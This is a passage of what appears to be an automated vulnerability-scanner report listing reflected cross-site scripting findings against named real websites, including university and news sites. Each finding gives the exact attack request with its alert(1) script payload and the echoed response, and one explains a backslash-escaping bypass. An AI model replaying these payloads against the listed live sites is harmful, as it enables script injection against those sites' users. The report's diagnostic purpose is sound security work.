Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1301712116"
Content-Type: text/html; charset=utf-8
Content-Length: 19142
Date: Sat, 02 Apr 2011 02:41:58 GMT
X-Varnish: 2024713043
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:dc="http://purl.org/dc/elements/1.1
...[SNIP]...
<a href="/user?destination=server-status?2b6bc"><script>alert(1)</script>dff9df1199=1">
...[SNIP]...

3.84. http://www.theroot.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.theroot.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95438"><script>alert(1)</script>2d6b1e727dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status95438"><script>alert(1)</script>2d6b1e727dd HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.theroot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Last-Modified: Sat, 02 Apr 2011 02:29:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 02 Apr 2011 02:29:07 GMT
Date: Sat, 02 Apr 2011 02:29:07 GMT
Content-Length: 15481
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name="
...[SNIP]...
<meta property="og:url" content="http://www.theroot.com/server-status95438"><script>alert(1)</script>2d6b1e727dd"/>
...[SNIP]...

3.85. http://www.thestar.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.thestar.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e77c'%3b1fb373810e was submitted in the REST URL parameter 1. This input was echoed as 9e77c';1fb373810e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-status9e77c'%3b1fb373810e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thestar.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Expires: Sat, 02 Apr 2011 02:26:41 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-5
cache-control: public, max-age=300
Content-Length: 51644
Date: Sat, 02 Apr 2011 02:18:42 GMT
X-Varnish: 1959729312
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish5-2
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_server-status9e77c';1fb373810e_hub_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=">
...[SNIP]...

3.86. http://www.thestar.com/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thestar.com
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d90e7"><script>alert(1)</script>13396dbe4eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?d90e7"><script>alert(1)</script>13396dbe4eb=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thestar.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Expires: Sat, 02 Apr 2011 02:26:07 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-4
cache-control: public, max-age=300
Content-Length: 51064
Date: Sat, 02 Apr 2011 02:18:08 GMT
X-Varnish: 1959725248
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish5-2
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<a href="/app/Login?ReturnUrl=/server-status?d90e7"><script>alert(1)</script>13396dbe4eb=1" rel="nofollow">
...[SNIP]...

3.87. http://www.toledoblade.com/server-info [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.toledoblade.com
Path:	/server-info

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 813be'%3b1c2ba0de953 was submitted in the REST URL parameter 1. This input was echoed as 813be';1c2ba0de953 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-info813be'%3b1c2ba0de953 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.toledoblade.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Cache-Control: public
Content-Type: text/html; charset=utf-8
Expires: Sat, 02 Apr 2011 01:59:11 GMT
Last-Modified: Sat, 02 Apr 2011 01:54:11 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: Libercus AppServer v1.0.0401.3
X-Passed-To: BCW03 Libercus (2011-04-01T21:54:11.0717454-04:00)
X-Processed-By: BCW03 Libercus (2011-04-01T21:54:11.0717454-04:00)
X-Completed-By: BCW03 Libercus (2011-04-01T21:54:11.9311534-04:00)
Date: Sat, 02 Apr 2011 01:54:11 GMT
Content-Length: 24982
X-Cache: MISS from bcs01
X-Cache-Lookup: MISS from bcs01:80
Via: 1.0 bcs01 (squid/3.0.STABLE19)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> - Toledo Blade</title>
<met
...[SNIP]...
<SCR'+'IPT LANGUAGE="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/tb2/SERVER-INFO813BE';1C2BA0DE953;pos=1;tile=1;dcopt=ist;adid=' + adid + ';sz=1x1;page=SECTION;ord=' + ord + '?">
...[SNIP]...

3.88. http://www.toledoblade.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.toledoblade.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14dce'%3bf63bcf83d7d was submitted in the REST URL parameter 1. This input was echoed as 14dce';f63bcf83d7d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-status14dce'%3bf63bcf83d7d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.toledoblade.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Cache-Control: public
Content-Type: text/html; charset=utf-8
Expires: Sat, 02 Apr 2011 02:31:31 GMT
Last-Modified: Sat, 02 Apr 2011 02:26:32 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: Libercus AppServer v1.0.0401.3
X-Passed-To: BCW04 Libercus (2011-04-01T22:26:31.8791182-04:00)
X-Processed-By: BCW04 Libercus (2011-04-01T22:26:31.8791182-04:00)
X-Completed-By: BCW04 Libercus (2011-04-01T22:26:32.8791502-04:00)
Date: Sat, 02 Apr 2011 02:26:32 GMT
Content-Length: 25094
X-Cache: MISS from bcs03
X-Cache-Lookup: MISS from bcs03:80
Via: 1.0 bcs03 (squid/3.0.STABLE19)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> - Toledo Blade</title>
<met
...[SNIP]...
<SCR'+'IPT LANGUAGE="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/tb2/SERVER-STATUS14DCE';F63BCF83D7D;pos=1;tile=1;dcopt=ist;adid=' + adid + ';sz=1x1;page=SECTION;ord=' + ord + '?">
...[SNIP]...

3.89. http://www.traderonline.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ed2d7<script>alert(1)</script>f14f7490fd2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statused2d7<script>alert(1)</script>f14f7490fd2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.traderonline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:50:01 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27592

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/server-statused2d7<script>alert(1)</script>f14f7490fd2</span>
...[SNIP]...

3.90. http://www.umd.edu/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.umd.edu
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload feb3b<script>alert(1)</script>00e7ed0c476 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusfeb3b<script>alert(1)</script>00e7ed0c476 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.umd.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

<html>
<head>
<title>404 Not Found</title>

<map name="mainbar">
<area shape=rect coords="0,0,104,19" href="http://www.umd.edu/whoswho.html" alt="Directories">
<area shape=rect coords="105,0,184,19" href="http://www.search.umd.edu/" alt="Sear
...[SNIP]...
<CENTER>The Web page you are trying to access, http://www.umd.edu/server-statusfeb3b<script>alert(1)</script>00e7ed0c476, at the <A HREF="http://www.umd.edu/">
...[SNIP]...

3.91. http://www.umd.edu/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.umd.edu
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c252a<script>alert(1)</script>806ac900486 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?c252a<script>alert(1)</script>806ac900486=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.umd.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

<html>
<head>
<title>403 Forbidden</title>

<map name="mainbar">
<area shape=rect coords="0,0,104,19" href="http://www.umd.edu/whoswho.html" alt="Directories">
<area shape=rect coords="105,0,184,19" href="http://www.search.umd.edu/" alt="Sear
...[SNIP]...
<CENTER>You do not have permission to access, http://www.umd.edu/server-status?c252a<script>alert(1)</script>806ac900486=1, on <A HREF="http://www.umd.edu/">
...[SNIP]...

3.92. http://www.utk.edu/server-info [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.utk.edu
Path:	/server-info

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7e554<script>alert(1)</script>ed93f49b8d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-info7e554<script>alert(1)</script>ed93f49b8d2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.utk.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 01:52:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Content-Length: 6537
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
...[SNIP]...
<span style="color: #d06000;">www.utk.edu/server-info7e554<script>alert(1)</script>ed93f49b8d2</span>
...[SNIP]...

3.93. http://www.utk.edu/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.utk.edu
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d9d7e<script>alert(1)</script>0a9974e9f8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusd9d7e<script>alert(1)</script>0a9974e9f8f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.utk.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:25:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Content-Length: 6539
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
...[SNIP]...
<span style="color: #d06000;">www.utk.edu/server-statusd9d7e<script>alert(1)</script>0a9974e9f8f</span>
...[SNIP]...

3.94. http://www.weei.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.weei.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf822'-alert(1)-'75e4f05332b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusbf822'-alert(1)-'75e4f05332b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.weei.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=900
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1301710361"
Last-Modified: Sat, 02 Apr 2011 02:12:41 GMT
X-AH-Environment: prod
Content-Length: 80002
Date: Sat, 02 Apr 2011 02:12:41 GMT
X-Varnish: 1739977646
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<m
...[SNIP]...
<!--
//configuration
OAS_url = 'http://oascentral.weei.com/';
OAS_sitepage = 'www.weei.com/server-statusbf822'-alert(1)-'75e4f05332b';
//OAS_sitepage = window.location.hostname + window.location.pathname;
OAS_listpos = 'x10,x20,x11';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '00123456789
...[SNIP]...

3.95. http://www.4shared.com/server-status [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/server-status

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload bcd7d--><script>alert(1)</script>f4d5f7b261f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.4shared.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=bcd7d--><script>alert(1)</script>f4d5f7b261f

Response

HTTP/1.1 404 /server-status
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 02 Apr 2011 02:39:58 GMT
Content-Length: 41831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script>alert(1)</script>f4d5f7b261f-->
...[SNIP]...

3.96. http://www.abcteach.com/server-info [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.abcteach.com
Path:	/server-info

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 28a70><script>alert(1)</script>24ad985c955 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-info HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.abcteach.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=28a70><script>alert(1)</script>24ad985c955

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 01:58:09 GMT
Server: Apache/2.2.6 (FreeBSD) mod_ssl/2.2.6 OpenSSL/0.9.7e-p1 DAV/2 PHP/4.4.7 with Suhosin-Patch
X-Powered-By: PHP/4.4.7
Vary: Accept-Encoding
Content-Length: 599
Content-Type: text/html

<html>
<head>
<title>Missing Page</title>
</head>

<body>
<H1>Missing Page</H1>

You have requested a page that has moved or is missing.
<br><br>
<form method="post" action="/globals/record_bad_url.ph
...[SNIP]...
<input type=hidden value=http://www.google.com/search?hl=en&q=28a70><script>alert(1)</script>24ad985c955 name=referrer>
...[SNIP]...

3.97. http://www.bnet.com/server-status [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bnet.com
Path:	/server-status

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a0a0"><a>3df0fa5767a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bnet.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: 2a0a0"><a>3df0fa5767a

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:53:03 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; expires=Sun, 01-Apr-2012 02:53:03 GMT; path=/; domain=.bnet.com
Content-Type: text/html; charset=utf-8
Content-Length: 68180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
g/i/r=10165&sg=1815&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4D9672C71EA5BA&orh=2a0a0"><a>3df0fa5767a&ort=&oepartner=&epartner=&ppartner=&pdom=2a0a0">
...[SNIP]...

3.98. http://www.careerbuilder.com/server-status [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.careerbuilder.com
Path:	/server-status

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb5e1\'%3balert(1)//4a0a57fbaa0 was submitted in the Referer HTTP header. This input was echoed as eb5e1\\';alert(1)//4a0a57fbaa0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.careerbuilder.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=eb5e1\'%3balert(1)//4a0a57fbaa0

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 44777
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=c86444fa76a84e4480ba515c0be3b7a5-355012557-VS-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X15802248F1D5BE2BBFFFBA413A1DFA64B997A0190E0E6429D00421C8E48B9F63670BE5D8558851B9AC9D41BB032E403FE; domain=.careerbuilder.com; expires=Mon, 02-Apr-2012 02:35:56 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: REBEL40
Date: Sat, 02 Apr 2011 02:35:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
404 Fi
...[SNIP]...
s_cb.server='www';
s_cb.eVar8='www.careerbuilder.com/404.aspx';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - eb5e1\\';alert(1)//4a0a57fbaa0';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

3.99. http://www.evite.com/server-status [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.evite.com
Path:	/server-status

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload f207d--><script>alert(1)</script>9d974f1e3a4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.evite.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=f207d--><script>alert(1)</script>9d974f1e3a4

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Vary: User-Agent
Expires: Sat, 02 Apr 2011 02:35:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 02:35:41 GMT
Content-Length: 15582
Connection: close
Set-Cookie: eviteAuth=; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: eviteAuth=; Domain=.evite.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: trackLoggedIn=; Domain=www.evite.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sequence=2; Path=/

                                                       



...[SNIP]...
<script>alert(1)</script>9d974f1e3a4-->
...[SNIP]...

3.100. http://www.fool.com/server-status [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.fool.com
Path:	/server-status

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload a5d48<script>alert(1)</script>f298079278e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fool.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=a5d48<script>alert(1)</script>f298079278e

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
